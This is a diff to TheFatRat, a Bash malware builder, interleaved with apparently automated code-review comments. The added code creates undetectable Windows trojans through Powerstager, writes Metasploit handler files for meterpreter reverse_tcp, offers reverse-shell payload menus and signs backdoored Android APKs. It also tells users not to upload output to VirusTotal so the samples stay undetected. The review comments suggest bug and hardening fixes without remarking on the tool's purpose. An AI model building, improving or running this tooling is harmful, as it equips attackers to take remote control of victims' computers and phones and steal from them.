-eq 0 ]; then - echo -e $okegreen [✔]::[Mingw32]: installation found!; + echo -e $okegreen [✔]::[Mingw64]: Installation found!; COMPILER="i686-w64-mingw32-gcc" else echo -e $red [x]::[warning]:this script require mingw32 or 64 installed to work ; echo "" - echo -e $red [!]::Run setup.sh to install ming32 ; - sleep 1 + echo -e $red [!]::Run setup.sh to install mingw ; + sleep 0.5 exit 1 fi fi -sleep 2 +sleep 0.5 # check backdoor-factory if exists which $backdoor > /dev/null 2>&1 if [ "$?" -eq "0" ]; then - echo -e $okegreen [✔]::[Backdoor-factory]: installation found!; + echo -e $okegreen [✔]::[Backdoor-factory]: Installation found!; else @@ -561,16 +954,16 @@ else echo "" echo -e $red [!]::Run setup.sh to install backdoor-factory ; echo "" - sleep 1 + sleep 0.5 exit 1 fi -sleep 2 +sleep 0.5 # check monodevelop if exists which monodevelop > /dev/null 2>&1 which dmcs > /dev/null 2>&1 if [ -d $find ]; then - echo -e $okegreen [✔]::[Monodevelop]: installation found!; + echo -e $okegreen [✔]::[Monodevelop]: Installation found!; else @@ -578,15 +971,15 @@ else echo "" echo -e $red [!]::Run setup.sh to install monodevelop ; echo "" - sleep 1 + sleep 0.5 exit 1 fi -sleep 2 +sleep 0.5 # check xterm if exists which xterm > /dev/null 2>&1 if [ -d $find ]; then - echo -e $okegreen [✔]::[Xterm]: installation found!; + echo -e $okegreen [✔]::[Xterm]: Installation found!; else @@ -594,14 +987,14 @@ else echo "" echo -e $red [!]::Run setup.sh to install xterm ; echo "" - sleep 1 + sleep 0.5 exit 1 fi - +sleep 0.5 # check gnome-terminal if exists which gnome-terminal > /dev/null 2>&1 if [ -d $find ]; then - echo -e $okegreen [✔]::[Gnome-terminal]: installation found!; + echo -e $okegreen [✔]::[Gnome-terminal]: Installation found!; else 
@@ -609,14 +1002,14 @@ else echo "" echo -e $red [!]::Run setup.sh to install gnome-terminal ; echo "" - sleep 1 + sleep 0.5 exit 1 fi - +sleep 0.5 # check upx if exists which upx > /dev/null 2>&1 if [ -d $find ]; then - echo -e $okegreen [✔]::[Upx]: installation found!; + echo -e $okegreen [✔]::[Upx]: Installation found!; else @@ -624,10 +1017,25 @@ else echo "" echo -e $red [!]::Run setup.sh to install upx ; echo "" - sleep 1 + sleep 0.5 exit 1 fi +sleep 0.5 +# check dex2jar if exists + which d2j-dex2jar > /dev/null 2>&1 + if [ -d $find ]; then + echo -e $okegreen [✔]::[Dex2jar]: Installation found!; +else + + echo -e $red [x]::[warning]:this script require Dex2jar to work ; + echo "" + echo -e $red [!]::Run setup.sh to install dex2jar ; + echo "" + sleep 0.5 + exit 1 +fi +sleep 2 #WARNING !!! resize -s 33 68 > /dev/null clear @@ -654,7 +1062,7 @@ echo " PLEASE DON'T UPLOAD BACKDOOT TO WWW.VIRUSTOTAL.COM " echo " YOU CAN UPLOAD OUTPUT/BACKDOOR FILE TO WWW.NODISTRIBUTE.COM " echo "==================================================================" echo "" -echo -n "Press any key to continue .............." +echo -n "Press [Enter] key to continue .............." read warning ############################## @@ -676,7 +1084,7 @@ then echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" echo -e $white":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" - sleep 1 + sleep 0.5 else resize -s 33 73 > /dev/null 
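Review bot: The new dex2jar check tests `[ -d $find ]`, but `find` is not assigned anywhere visible in the diff, so the expression becomes `[ -d ]`, a one-argument test that is always true, and "Installation found!" prints whether or not `d2j-dex2jar` exists; the result of the `which` on the line above is discarded. Use the pattern the apktool and aapt checks use, `if [ "$?" -eq "0" ]; then` directly after the `which`, or simply `if command -v d2j-dex2jar >/dev/null 2>&1; then`. The monodevelop, xterm, gnome-terminal and upx checks in the -561, -578, -594 and -609 hunks share the same always-true test, so their `exit 1` paths are unreachable. This block also ends with `sleep 2` where every other check was changed to `sleep 0.5` in this commit.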
@@ -717,6 +1125,84 @@ else fi read -p "Press [Enter] key to Continue..." clear +} +######################### +#CHECK DEPENDICIES +######################### +clear +echo -e $cyan" ____ _ _ _ " +echo " / ___| |__ ___ ___| | _(_)_ __ __ _ " +echo " | | | '_ \ / _ \/ __| |/ / | '_ \ / _\ | " +echo " | |___| | | | __/ (__| <| | | | | (_| | _ _ _ " +echo " \____|_| |_|\___|\___|_|\_\_|_| |_|\__/ | (_) (_) (_)" +echo " |___/ " +echo -e $lightgreen'-- -- +=[(c) 2016-2017 | dracos-linux.org | Linuxsec.org | Hacker Indonesia ' +echo -e $cyan'-- -- +=[ Author: Screetsec < Edo Maland > ]=+ -- -- ' +echo -e " " + +if [ $(id -u) != "0" ]; then + + echo -e $red [!]::[Check Dependencies] ; + sleep 0.5 + echo -e $red [✔]::[Check User]: $USER ; + echo -e $red [✔]::[Distro]: $distro ; + echo -e $red [✔]::[Release]: $rlname ; + sleep 0.5 + echo -e $red [x]::[not root]: you need to be [root] to run this script.; + echo "" + sleep 1 + exit + + +else + + echo -e $okegreen [!]::[Check Dependencies]: ; + sleep 0.5 + echo -e $okegreen [✔]::[Distro]: $distro ; + echo -e $okegreen [✔]::[Release]: $rlname ; + echo -e $okegreen [✔]::[Check User]: $USER ; + +sleep 0.5 +fi + +#Checking if user is using a local terminal or a remote shell +if [ -n "$SSH_CLIENT" ] || [ -n "$SSH_TTY" ]; then + echo -e $red [✔]::[Terminal]: remote ; +echo "" + echo -e $red "Fatrat & Setup does not work over a remote secure shell ." + echo "" +echo -e $green "If you want to Install Fatrat on a remote computer then " +echo -e $green "use a remote desktop connection like (rdesktop) or (vnc) " +echo "" +echo -e $green "Press [ENTER] key to exit" +read abor +exit 1 +else +sleep 0.5 +echo -e $okegreen [✔]::[Terminal]: local ; + case $(ps -o comm= -p $PPID) in + sshd|*/sshd) SESSION_TYPE=remote/ssh;; + esac +fi + +sleep 0.5 +#Checking internet connection by pinging hostname or ip dns (google) + ping -c 1 google.com > /dev/null 2>&1 +png="$?" 
+ if [ $png == "0" ] +then + echo -e $okegreen [✔]::[Internet Connection]: CONNECTED!; + sleep 0.5 + cont +elif [ $png == "1" ] +then + echo -e $yellow [✔]::[Internet Connection]: LOCAL ONLY!; + chknet +elif [ $png == "2" ] +then +echo -e $red [✔]::[Internet Connection]: OFFLINE!; +chknet +fi function Stop() { #Stoped Service postgresql & apache 
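Review bot: The `SESSION_TYPE=remote/ssh` assignment in the `else` branch of the terminal check is dead code: nothing in the hunk reads the variable, and the branch has already printed `[Terminal]: local`, so an sshd parent found by `ps -o comm= -p $PPID` changes nothing; either route that case to the same exit as the `SSH_CLIENT`/`SSH_TTY` branch or drop the `case`. The top-level `ping google.com` dispatch has the same gap as `chknet`: any status other than 0, 1 or 2 (for example 127 when `ping` is absent) calls neither `cont` nor `chknet`, so an `else` arm is needed here too. `[ $png == "0" ]` should be `[ "$png" -eq 0 ]` for a numeric status. The hunk's last context line opens `function Stop()`, which continues outside the hunk.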
@@ -732,6 +1218,282 @@ function Stop() { } +function pstagef() { + +# Powerstager file will be stored in main fatrat directory +# Checking if file was created + +fout="$path/output" +if [ -f $fstager ] +then +echo -e $okegreen "[✔] Your FUD Rat file was created succefully" +sleep 2 +else +echo -e $red "" +echo "[x] There was an error creating your FUD rat with Powerstager ." +echo -e $okegreen "" +echo "Press [ENTER] key to continue to return to fatrat menu" +read rmenu +clear +menu + +fi + +#File was created , now checking if file name exists in final output directory +# In case there is already a file in output dir with same name , then rename it + +ren=`shuf -i 1-1000 -n 1` +chk="$path/output/$fira.exe" +if [ -f "$chk" ]; then +mv $chk $path/output/old_$ren.exe >> $logfud 2>&1 +echo -e $yellow " " +echo "[!] FatRat Detected that you already had a previous created FUD" +echo "file in ($path/output/) with the name $fira.exe ." +echo -e $okegreen "" +echo "[✔] FatRat have renamed your old FUD Rat to old_$ren.exe" +echo "" +mv $fstager $path/output/$fira.exe >> $logfud 2>&1 +echo "" +echo -e $cyan "[*] You can find your file in : +$chk" +echo "" + +#Option to create a listener +echo -e $okegreen "Do you want to create a listener for this configuration" +echo -e $okegreen "to use in msfconsole in future ?" +echo "" +echo -ne "Choose y/n : ";tput sgr0 +read sel +case $sel in +y|Y|yes|Yes|YES) +echo "" +echo -e $green "Write the name for this config . 
(ex : pstager)" +echo -ne "Filename : ";tput sgr0 +read fname +if [ -z $fname ] +then +svf=$path/config/listeners/pstager.rc +rm -rf $svf >/dev/null 2>&1 +echo "use exploit/multi/handler" > $svf +echo "set PAYLOAD windows/x64/meterpreter/reverse_tcp" >> $svf +echo "set LHOST $yourip" >> $svf +echo "set LPORT $yourport" >> $svf +echo "exploit -j" >> $svf +echo -e $okegreen "" +echo "Configuration file saved to $list/pstager.rc" +echo "" +else +svf=$path/config/listeners/$fname.rc +rm -rf $svf >/dev/null 2>&1 +echo "use exploit/multi/handler" > $svf +echo "set PAYLOAD windows/x64/meterpreter/reverse_tcp" >> $svf +echo "set LHOST $yourip" >> $svf +echo "set LPORT $yourport" >> $svf +echo "exploit -j" >> $svf +echo -e $okegreen "" +echo "Configuration file saved to $list/$fname.rc" +echo "" +fi +;; +n|N|no|No|NO) +# no msfconsole configuration option selected +echo "" +;; +*) +echo "Wrong input " +echo "" +;; +esac +else +mv $fstager $path/output/$fira.exe >> $logfud 2>&1 +echo "" +echo -e $okegreen "[*] You can find your file in +$chk" +echo "" +# No duplicate in final destination , moving FUD to final destination + +#Option to create a listener +echo -e $okegreen "Do you want to create a listener for this configuration" +echo -e $okegreen "to use in msfconsole in future ?" +echo "" +echo -ne "Choose y/n : ";tput sgr0 +read sel +case $sel in +y|Y|yes|Yes|YES) +echo "" +echo -e $green "Write the name for this config . 
(ex : pstager)" +echo -ne "Filename : ";tput sgr0 +read fname +if [ -z $fname ] +then +svf=$path/config/listeners/pstager.rc +rm -rf $svf >/dev/null 2>&1 +echo "use exploit/multi/handler" > $svf +echo "set PAYLOAD windows/x64/meterpreter/reverse_tcp" >> $svf +echo "set LHOST $yourip" >> $svf +echo "set LPORT $yourport" >> $svf +echo "exploit -j" >> $svf +echo -e $okegreen "" +echo "Configuration file saved to $list/pstager.rc" +echo "" +else +svf=$path/config/listeners/$fname.rc +rm -rf $svf >/dev/null 2>&1 +echo "use exploit/multi/handler" > $svf +echo "set PAYLOAD windows/x64/meterpreter/reverse_tcp" >> $svf +echo "set LHOST $yourip" >> $svf +echo "set LPORT $yourport" >> $svf +echo "exploit -j" >> $svf +echo -e $okegreen "" +echo "Configuration file saved to $list/$fname.rc" +echo "" +fi +;; +n|N|no|No|NO) +# no msfconsole configuration option selected +echo "" +;; +*) +echo "Wrong input " +echo "" +;; +esac +fi +echo -e $okegreen "Press [ENTER] key to return to FUDWIN menu" +read fwin +fudwin +} + +function fudwin() { +rm -rf $logfud > /dev/null 2>&1 +touch $logfud > /dev/null 2>&1 +clear +echo -e $okegreen " _______ ___ ___ ______ ___ ___ ___ ______ " +echo -e $okegreen " | _ | Y | _ \ | Y | | _ \ " +echo -e $okegreen " |. 1___|. | |. | \|. | |. |. | |" +echo -e $okegreen " |. __) |. | |. | |. / \ |. |. | |" +echo -e $okegreen " |: | |: 1 |: 1 |: |: |: | |" +echo -e $okegreen " |::.| |::.. . |::.. . /|::.|:. 
|::.|::.| |" +echo -e $okegreen " --- ------- ------ --- --- --- --- --- $cyan 1.0" + +echo -e $cyan "" +echo -e $cyan "Select one tool to create your Windows EXE FUD Rat " +echo -e $cyan "" +echo "" +echo -e $white "[$okegreen 1$white ]$okegreen -$yellow Powerstager 0.2 by z0noxz $okegreen(NEW)" +echo -e $white "[$okegreen 2$white ]$okegreen -$yellow Slow But Powerfull $okegreen(OLD)" +echo -e $white "[$okegreen 3$white ]$okegreen -$yellow Return to menu" +echo "" +echo -e $okegreen" ┌─["$red"TheFatRat$okegreen]──[$red~$okegreen]─["$yellow"FUDWIN$okegreen]:" + echo -ne $okegreen" └─────► " ;tput sgr0 + read fwin + +case $fwin in +1) +echo "" + spinlong + echo -e $okegreen"" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" + echo -e $yellow " Your public IP address is : $publicip" + echo -e $yellow " Your Hostname is : $hostn" + echo -e $okegreen"" +if [ ! -f "$defcon" ] +then +yourip="" +yourport="" +fi + if [ -z "$yourip" ]; then + read -p ' Set LHOST IP: ' yourip + fi + echo -e $okegreen "" + if [ -z "$yourport" ]; then + read -p ' Set LPORT: ' yourport + fi + read -p ' Please enter the base name for output files : ' fira +invalid +if [ $err == "1" ] +then +echo -e $okegreen "" +echo -n "Press [ENTER] key to return to menu ." +read inp +fudwin +fi +which i686-w64-mingw32-gcc >> $logfud 2>&1 + if [ "$?" 
-eq "0" ]; then +echo "" +echo -e $yellow "Select Windows Architeture target" +echo "" +echo -e $cyan "1 -$okegreen 32Bit (XP,7,Vista)" +echo -e $cyan "2 -$okegreen 64Bit (XP64,Vista,7,8,10)" +echo "" +echo -e $lightgreen "Choose (1,2)" +read choice +if [ $choice == "1" ] +then +echo -e $okegreen "[*] Builing your powerstage rat for windows with the following values" +echo "" +echo -e $yellow "Target :$okegreen Windows 32 Bit" +echo -e $yellow "Your IP/Host :$okegreen $yourip" +echo -e $yellow "Your Port :$okegreen $yourport" +echo -e $yellow "Rat Filename :$okegreen $fira" +fstager=$path/$fira +echo -e $okegreen "[*] Starting the creation of your FUD 32bit Exe" +sleep 4 +python $pstager -t win32 -o $fira -m --lhost $yourip --lport $yourport >> $logfud 2>&1 +pstagef + +elif [ $choice == "2" ] +then +echo -e $okegreen "[*] Builing your powerstage rat for windows with the following values" +echo "" +echo -e $yellow "Target :$okegreen Windows 64 Bit" +echo -e $yellow "Your IP/Host :$okegreen $yourip" +echo -e $yellow "Your Port :$okegreen $yourport" +echo -e $yellow "Rat Filename :$okegreen $fira" +fstager=$path/$fira +python $pstager -t win64 -o $fira -m --lhost $yourip --lport $yourport >> $logfud 2>&1 +pstagef + +else +fudwin +fi +fi + +which i586-mingw32msvc-gcc >> $logfud 2>&1 +if [ "$?" 
-eq "0" ]; then +echo "" +echo -e $okegreen "[*] Builing your powerstage rat for windows with the following values" +echo "" +echo -e $yellow "Target :$okegreen Windows 32 Bit" +echo -e $yellow "Your IP/Host :$okegreen $yourip" +echo -e $yellow "Your Port :$okegreen $yourport" +echo -e $yellow "Rat Filename :$okegreen $fira" +fstager="$path/$fira" +python $pstager -t win32 -o $fira -m --lhost $yourip --lport $yourport >> $logfud 2>&1 +pstagef +fi +;; +2) +chmod +x powerfull.sh + xterm -fa monaco -fs 13 -bg black ./powerfull.sh + clear + menu +;; +3) +clear + menu +;; +*) +clear +echo -e $red " Incorrect Number" +echo "" +sleep 2 + + fudwin +;; +esac +} function cmsfvenom() { clear @@ -773,16 +1535,26 @@ echo "" then echo "" spinlong - echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + # Show user current lanip , public ip & current hostname + + echo -e $okegreen"" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" echo -e $okegreen"" + +#checking if default lhost & lport config exists +# If config does not exists then set lhost & lport values to no value + if [ ! -f "$defcon" ] then yourip="" yourport="" fi + +#If lhost & lport values are null then popup user manual input + if [ -z "$yourip" ]; then read -p ' Set LHOST IP: ' yourip fi 
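Review bot: In `pstagef` the `[ -z $fname ]` test and the `svf=$path/config/listeners/$fname.rc` / `rm -rf $svf` lines use the prompt input unquoted and unvalidated, so a name with whitespace makes `test` fail with "too many arguments" and a name containing `..` places (and first deletes) a file outside the listeners directory. Quote the test, `if [ -z "$fname" ]`, reject anything but a plain basename before building the path, e.g. `case $fname in ''|*/*|*..*|-*) fname=pstager;; esac`, and use `rm -f -- "$svf"` since the target is a file. The same pattern appears in the `@@ -960` hunk with `payloadapk` and in the `@@ -1663` hunk with `$fln`. Separately, the "There was an error creating" branch calls `menu` without returning, so if `menu` returns the function continues into the rename/move logic with no file; add `return 1` after `menu`. The listener-prompt block is duplicated verbatim in both branches of `if [ -f "$chk" ]` and could be hoisted after that `fi`, which also applies to the `i686-w64-mingw32-gcc` and `i586-mingw32msvc-gcc` checks in `fudwin`, where the second is not an `else` of the first.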
@@ -791,16 +1563,21 @@ fi read -p ' Set LPORT: ' yourport fi read -p ' Please enter the base name for output files : ' fira + +# Checking if user filled lhost , lport & filename with any input +# Case any of these inputs are blank then "invalid" function will popup a message to user +# and will return to msfvenom menu + invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp cmsfvenom fi - payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "linux/ppc/shell_reverse_tcp" FALSE "linux/x86/shell_reverse_tcp" FALSE "linux/x86/meterpreter/reverse_tcp" FALSE "osx/armle/shell_reverse_tcp" FALSE "osx/ppc/shell_reverse_tcp" FALSE "bsd/x86/shell/reverse_tcp" FALSE "solaris/x86/shell_reverse_tcp" --width 350 --height 300) > /dev/null 2>&1 - spinlong +pldlnx + spinlong echo "" echo "" gboor @@ -816,14 +1593,14 @@ then echo -e $red "" echo "There was an error in the creation of your rat file" echo -e $okegreen "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom else echo -e $okegreen "" echo "Your rat file was created and it is stored in : $path/output/$fira.elf" echo "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom fi @@ -833,7 +1610,8 @@ fi echo "" spinlong echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] 
@@ -855,12 +1633,12 @@ fi if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp cmsfvenom fi - payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" FALSE "windows/powershell_bind_tcp" FALSE "windows/powershell_reverse_tcp" --width 350 --height 300) > /dev/null 2>&1 - echo "" +pldwin +echo "" echo "" gboor spinlong @@ -875,14 +1653,14 @@ then echo -e $red "" echo "There was an error in the creation of your rat file" echo -e $okegreen "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom else echo -e $okegreen "" echo "Your rat file was created and it is stored in : $path/output/$fira.exe" echo "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom fi @@ -891,7 +1669,8 @@ fi echo "" spinlong echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] 
@@ -913,12 +1692,12 @@ fi if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp cmsfvenom fi - payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/shell/reverse_tcp" --width 350 --height 300) > /dev/null 2>&1 - echo "" +pldand +echo "" echo "" gboor spinlong @@ -934,7 +1713,7 @@ then echo -e $red "" echo "There was a problem in the creation of your rat apk file , make sure your metasploit is running correctly" echo -e $okegreen "" -read -rsp $'Press any key to return to fatrat menu\n' -n 1 key +read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key clear menu fi @@ -942,7 +1721,9 @@ fi echo "[✔] Done!" echo "[*] Creating a Valid Certificate" sleep 1 + #Creating certificate and storing info in logfile + $keytool -genkey -v -keystore $path/temp/debug.keystore -storepass android -alias androiddebugkey -keypass android -dname "CN=Android Debug,O=Android,C=US" -keyalg RSA -keysize 2048 -validity 10000 >>$log 2>&1 cerapk=$path/temp/debug.keystore if [ ! -f "$cerapk" ] @@ -950,7 +1731,7 @@ then echo -e $red "" echo "There was a problem creating a valid certificate ." echo -e $okegreen "" -read -rsp $'Press any key to return to fatrat menu\n' -n 1 key +read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key clear menu fi 
@@ -960,13 +1741,27 @@ echo "[*] Signing your payload APK" sleep 1 $sign -verbose -keystore $path/temp/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA $path/backdoored/$fira.apk androiddebugkey >>$log 2>&1 echo "[✔] Done!" + +# After signing the apk file , android certificate is not needed anymore +# deleting certificate + rm $path/temp/debug.keystore sleep 1 echo "" -zenity --question --text="`printf "Do you want to create a listener for this configuration \n to use in msfconsole in future ?"`" -if [ $? = 0 ] ; then -save=$(zenity --entry --title="Save Msfconsole Config" --width=100 --height=100 --text="Write the name for this config." --entry-text="payloadapk"); -svf=$path/config/listeners/$save.rc +echo -e $okegreen "Do you want to create a listener for this configuration" +echo -e $okegreen "to use in msfconsole in future ?" +echo "" +echo -ne "Choose y/n : ";tput sgr0 +read sel +case $sel in +y|Y|yes|Yes|YES) +echo "" +echo -e $green "Write the name for this config . (ex : payloadapk)" +echo -ne "Filename : ";tput sgr0 +read fname +if [ -z $fname ] +then +svf=$path/config/listeners/payloadapk.rc rm -rf $svf >/dev/null 2>&1 echo "use exploit/multi/handler" > $svf echo "set PAYLOAD $payload" >> $svf @@ -974,9 +1769,18 @@ echo "set LHOST $yourip" >> $svf echo "set LPORT $yourport" >> $svf echo "exploit -j" >> $svf echo -e $okegreen "" -echo "Configuration file saved to $list/$save.rc" +echo "Configuration file saved to $list/payloadapk.rc" +else +svf=$path/config/listeners/$fname.rc +rm -rf $svf >/dev/null 2>&1 +echo "use exploit/multi/handler" > $svf +echo "set PAYLOAD $payload" >> $svf +echo "set LHOST $yourip" >> $svf +echo "set LPORT $yourport" >> $svf +echo "exploit -j" >> $svf +echo -e $okegreen "" +echo "Configuration file saved to $list/$fname.rc" fi - # Checking if file was created fileout="$path/backdoored/$fira.apk" if [ ! -f "$fileout" ] 
@@ -984,24 +1788,54 @@ then echo -e $red "" echo "There was an error in the creation of your rat file" echo -e $okegreen "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom else echo -e $okegreen "" echo "Your payload apk was created and signed , and it is located in : $fileout" echo "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom fi +;; +n|N|no|No|NO) +# Checking if file was created +fileout="$path/backdoored/$fira.apk" +if [ ! -f "$fileout" ] +then +echo -e $red "" +echo "There was an error in the creation of your rat file" +echo -e $okegreen "" +echo -ne "Press [ENTER] key to return to menu ." +read cont +cmsfvenom +else +echo -e $okegreen "" +echo "Your payload apk was created and signed , and it is located in : $fileout" +echo "" +echo -ne "Press [ENTER] key to return to menu ." +read cont +cmsfvenom +fi +;; +*) +echo "Wrong input , returning to Msfvenom menu ." +echo "" +echo -ne "Press [ENTER] key to return to menu ." +read cont +cmsfvenom +;; +esac elif test $fatrat1 == '4' then echo "" spinlong echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -1024,7 +1858,7 @@ fi if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp cmsfvenom fi 
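Review bot: The `n|N|no|No|NO)` arm repeats the whole "Checking if file was created" block from the `y` arm, and the `*)` arm skips it entirely, so a mistyped answer returns to the msfvenom menu without reporting whether `$fileout` exists. Since the check does not depend on `$sel`, move it once after `esac` and let each arm handle only the listener question; the `*)` arm then just prints `Wrong input` and falls through. The `case $sel` that this `esac` closes is opened in the `@@ -960` hunk, outside this one.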
@@ -1044,14 +1878,14 @@ then echo -e $red "" echo "There was an error in the creation of your rat file" echo -e $okegreen "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom else echo -e $okegreen "" echo "Your rat file was created , and it is located in : $fileout" echo "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom fi @@ -1060,7 +1894,8 @@ fi echo "" spinlong echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -1082,7 +1917,7 @@ fi if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp cmsfvenom fi @@ -1101,14 +1936,14 @@ then echo -e $red "" echo "There was an error in the creation of your rat file" echo -e $okegreen "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom else echo -e $okegreen "" echo "Your rat file was created , and it is located in : $fileout" echo "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom fi @@ -1117,7 +1952,8 @@ fi echo "" spinlong echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] 
@@ -1140,7 +1976,7 @@ fi if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp cmsfvenom fi @@ -1160,14 +1996,14 @@ then echo -e $red "" echo "There was an error in the creation of your rat file" echo -e $okegreen "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom else echo -e $okegreen "" echo "Your rat file was created , and it is located in : $fileout" echo "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom fi @@ -1176,7 +2012,8 @@ fi echo "" spinlong echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -1199,7 +2036,7 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp cmsfvenom fi @@ -1219,14 +2056,14 @@ then echo -e $red "" echo "There was an error in the creation of your rat file" echo -e $okegreen "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom else echo -e $okegreen "" echo "Your rat file was created , and it is located in : $fileout" echo "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom fi 
@@ -1235,7 +2072,8 @@ fi echo "" spinlong echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -1258,7 +2096,7 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp cmsfvenom fi @@ -1277,14 +2115,14 @@ then echo -e $red "" echo "There was an error in the creation of your rat file" echo -e $okegreen "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom else echo -e $okegreen "" echo "Your rat file was created , and it is located in : $fileout" echo "" -echo -ne "Press any key to return to menu ." +echo -ne "Press [ENTER] key to return to menu ." read cont cmsfvenom fi @@ -1293,7 +2131,8 @@ fi echo "" spinlong echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -1316,7 +2155,7 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp cmsfvenom fi 
